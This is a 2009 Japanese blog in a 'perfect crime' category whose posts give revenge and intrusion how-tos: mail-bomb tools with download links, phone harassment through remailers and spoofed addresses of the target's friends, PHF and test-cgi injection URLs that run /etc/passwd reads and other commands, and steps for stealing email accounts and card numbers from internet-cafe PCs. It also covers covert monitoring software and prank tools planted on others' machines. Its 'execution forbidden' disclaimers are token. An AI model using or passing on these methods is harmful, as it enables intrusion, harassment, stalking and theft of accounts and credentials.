2009年09月03日

メールボムを使っての復讐方法

お手軽な復讐方法のメールボムです。
メールボムを送信出来るソフトをいくつかご紹介します。

Unabomber
http://sou.tuzigiri.com/TOOL/unabomber.lzh
http://blackmarket.jp/column/teq/991025/unabomber.lzh

QuickFyre
http://sou.tuzigiri.com/TOOL/QuickFyre.zip

サーバの機能に重大な損傷を及ぼす行為は、電子計算機損壊等威力業務
妨害罪に問われます。(刑法234条の2:5年以下の懲役または100万円以
下の罰金)

実行は厳禁です。
posted by ubermensch at 23:59| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

携帯へのいたずらメールに報復する方法

PCではなく、携帯へのいたずらメールに報復するには、フリーメールか
らメールボムを送るのが手っ取り早く、また被害も甚大です。

相手がPCメールを拒否している場合もあるので、リメーラを経由させて
架空の携帯アドレスからメールを送ります。

※リメーラとは、匿名メールを実現するために存在するサイトです。
ここに定型のメールを送ると、メールヘッダのすげ替えが行われて、
本当の受信者へメールが転送されます。
詳しくは下記のリンクをご参照ください。

au携帯の受信拒否リストに同時に登録出来るのは20種類までなので、21
種類以上のアドレスから連続でメールを送り続けることが出来れば、犯
人は眠れない夜を過ごすことになります。通信料も馬鹿になりません。

また、もし犯人の目星ついているのであれば、犯人と仲がいい人間のア
ドレスから偽メールを送信すれば、相手の人間関係を破壊することも出
来るかもしれません。

実行は厳禁です。

参考:匿名メールとリメーラ
http://www.hyuki.com/security/remailer.html

posted by ubermensch at 23:57| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

攻撃兵器に変身するプラウザソフト no.2【”TEST”アタック】

同じくCGIスクリプトの中で、Test スクリプトというのがあります。
書式,としては、以下です。

http://●●●●.com/cgi-bin/test-cgi?\whatever

もし、このスクリプトが削除されずにサーバーにあれば、きっとこんな
応答が返ってくるでしょう。

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

どこかでみた事あると思いませんか。

さて、PHFのところでも出ましたが、「0a」キャラクタをここでもう1度
使います。
ところで、この[「0a」キャラクタなんですが、実におもしろい働きをす
るらしいのです。他のファイルを引っ張ってくるという作用です。これ
を利用して、パスワードファイルを閲覧するには以下の書式になります。

http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd

もし、この「0a」キャラクタの文字列の作用がキャンセルされていなけ
れば、これもまた有効な方法です。
posted by ubermensch at 23:56| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

攻撃兵器に変身するプラウザソフト no.1

Webサーバーは、通常root(システム管理者)環境下で動作している事が
多いです。という事は、Webサーバーに、何かをさせる事は、つまりは、
システム管理者が、それを実行している事を意味します。

さて、Webサーバーは、不特定多数の人に見てもらうためにあります。普
通はそう思います。攻撃原理にあるように、システムへのアクセスする
方法と手段がある事になります。
IEやネスケがそのツールです。

前述のとおり、Webサーバーがroot環境下にある事が、このセキュリティ
リスクを、さらに増大させます。では、どうやるのでしょうか。
以下に、過去におこったアタックの方法について、解説します。


【PHFアタック】

現在、この方法は、かなり陳腐となってしまいましたが、Webサーバーの
Hackに関しては、その方法の基本を象徴するようなアタックです。

PHFファイルは、CGIスクリプトの事例として、デフォルトでインストー
ルされるファイルで、Phonebook形式のリストをUPDATEするものです。
CGIをそのWebサーバーにインストールすると,/cgi-bin/のディレクトリ
の中に、phfは作られます。そして、その事を当初、システム管理者は知
らなかったのです。

Unixサーバーにおけるアタック方法としては、以下のようなものがあり
ます。

http://●●●●.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
↑ ターゲットサイトのURL・ドメイン名

これは、プラウザソフトの「アドレス」とか「場所」等のURLが現れる場
所に、いれてリターンを叩けばOKです。
また、同様な他のアタック書式としては、以下です。

http://●●●●.com/cgi-bin/phf?%0aid==haqr=
(idコマンドの実行)

http://●●●●.com/cgi-bin/phf?%0als%20-la%20%7E▲▲▲==
ユーザーのID(/~xxxxx によく見られる)↑(ls -la ~someuser コマンドの実行)

現在でも、この攻撃が可能なマヌケなマシンはないと思いますが、あれ
ばとてもラッキーではないでしょうか。勿論、アタック実行の場合は、
匿名性の高いProxyサーバー経由での攻撃が常識です。


posted by ubermensch at 23:54| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

ハッキング攻撃いろいろ(基本編)

Hackするという事は、決ったルールがあったり、難しい事ではありませ
ん。しかし、たいていのシステムには、Hackするのに4つの基本的な事が
あるといえます。それらを理解する必要が当然あります。
その4つの基本事項とはなんでしょうか?

1.ターゲットの攻撃前に、出来る限りそのシステムについて情報を収集
します。そして、ゴールを決めます。Hackして何を得るのかを考えま
す。(アカウント?秘密のファイル?)

2.システムにアクセスしてみます。勿論、そのポイントが間違いなく、
攻撃すべき部分であるという事が条件です。つまり、普通のユーザー
としてアクセルするのか、FTPなのか、Sendmailのバグをつくのか、と
いった事です。いずれにしろ、直接、間接にアクセスできなければ、
何も始まりません。

3.システムへのアクセスをへて、その中に入れるのなら、次にトロイの
木馬を注入したり、パスワードファイルをコピーしクラックします。
そして、そのシステムの管理者やユーザーが秘密にしておきたいファ
イルなどを見付ける事ができます。

4.隠された経路、つまりBackdoorの探索も、もうひとつの方法です。
システム管理者や、サイトの管理者が、自分(またはスタッフ)だけ
に解放している入り口を設ける事が多いのです。
しかし、その経路へのアクセスは記録され、侵入の後に抹消される可
能性があります。しかし、これもひとつの方法です。


この4つの事柄を、真に身につけるのならば、Hackにさして困難はありま
せん。では、実際に行われた過去の事例を見て、考えてみましょう。

posted by ubermensch at 23:52| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

誰でも出来る他人のアカウントクラック

最近ではどこに行っても、漫画喫茶やインターネットカフェがあると思
います。そこで使っているPCには、結構個人情報が残っている事が多い
です。

まず、1番良く残っているのが、メールアドレスのアカウントです。フリ
ーメールから、プロバイダーのまで。大体、Outlook Express を使って
いるので、「ツール」→「アカウント」→「エクスポート」で、FDに簡
単に落とせます。

家に帰ったら、それを逆の手順でインポートするだけです。私はこれで
50個以上のメールアカウントを所持しています。

あと、IEのオートコンプリート機能と履歴を利用して、名前、住所、電
話番号を読み取ることが出来ます。

それから、暗号化していないサイトで、カードを使ってショッピングし
た時には、カードの番号も見れてしまいます。
posted by ubermensch at 23:48| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

イタズラしたい相手のPCにしかけるソフト1

「なんかあいつムカツク」「一泡ふかせてやりたい」等と思う人、必ず
存在すると思います。ターゲットがパニックになるのを見てみたいです
よね。そんなツールを紹介します。

HIKARU
http://www.vector.co.jp/soft/win95/amuse/se217070.html

このツールは起動すると、一定時間ごとに幽霊女の顔が画面いっぱいに
表示されます。悲鳴がなるというツールです。
ちなみに、タスクと麗などにはなんの表示もされません。終了するには
PCを再起動するか、WindowsXPの場合、タスクマネージャで終了させる必
要があります。スタートアップに登録したら最高です。


キャリー
http://kunsama.ld.infoseek.co.jp/file/CARRIE.LZH

これは、映画「キャリー」で、主人公のキャリーが豚の血を浴びる場面
を再現したものです。まぁたいしたもんじゃないですけど・・・。


悪戯は計画的に
http://www.vector.co.jp/soft/win95/amuse/se239381.html

これはいいです。
簡単操作でブラクラのような効果があります。CDトレイを突然開閉させ
たり、架空のウイルス警告をしたりと、計8種類の悪戯を起動時間を設定
して狙い撃ちできるというものです。


遠隔落書装置
http://www.vector.co.jp/soft/win95/amuse/se149690.html

これは、前もって仕掛けておいて、他人が席についたのを見計らって自
分のPCでサーバ側のソフトを実行。ネットワーク経由で他人パソコンの
画面上に落書きをするツールです。
いきなりデスクトップに血文字とかが表示されたら、びっくりですよね。


posted by ubermensch at 23:47| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

ターゲットのPCを監視する方法

以下のフリーウェアソフトを紹介します。

今、何してる?
http://007.jp/jp/

このソフトを使えば、ターゲットのPCを監視する事が可能になります。
インストールも、ステルスモードがあって、非常に有効です。
画面をキャプチャしたり、PCを再起動をさせたり、メッセージを送る事
も可能です。勿論、ウイルス対策ソフトにも検知されません。

posted by ubermensch at 23:43| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

完全に身元を隠してホームページにアクセスする方法

インターネットでホームページをアクセスすると、こちらからメールア
ドレスなどを送信しなくても、アクセスされた側はサーバーにチョット
仕掛け(訪問者CGI等)をしておくだけで、どこのサーバー(アクセスし
た人が直接接続しているコンピュータ)からアクセスされているか知る
ことができます。

専用線でなければ個人までは特定できませんが、どのプロバイダや会社
に属しているかわかってしまうのです。
そこで、何らかの事情により、完全に身元を隠してアクセスしたいペー
ジがある時に役に立つのがTHE ANONYMIZER です。

まず、一旦 http://www.anonymizer.com/ にアクセスし、そこから目的
のページにアクセスすれば、完全に身元を隠すことができます。
もちろん、無料です。
posted by ubermensch at 23:42| Comment(0) | 完全犯罪系 | このブログの読者になる | 更新情報をチェックする

広告


この広告は60日以上更新がないブログに表示がされております。

以下のいずれかの方法で非表示にすることが可能です。

・記事の投稿、編集をおこなう
・マイブログの【設定】 > 【広告設定】 より、「60日間更新が無い場合」 の 「広告を表示しない」にチェックを入れて保存する。


×

この広告は1年以上新しい記事の投稿がないブログに表示されております。